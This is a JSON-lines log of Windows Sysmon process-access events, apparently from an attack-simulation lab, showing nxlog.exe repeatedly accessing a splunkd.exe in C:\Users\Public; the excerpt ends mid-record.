{"EventTime":"2020-08-01 06:57:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6489,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:32.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:32.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6490,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:33.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:33.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6491,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:34.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:34.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6492,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:35.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:35.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6493,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:36.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:36.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6494,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:37.546\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:37.546","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6495,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:38.547\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 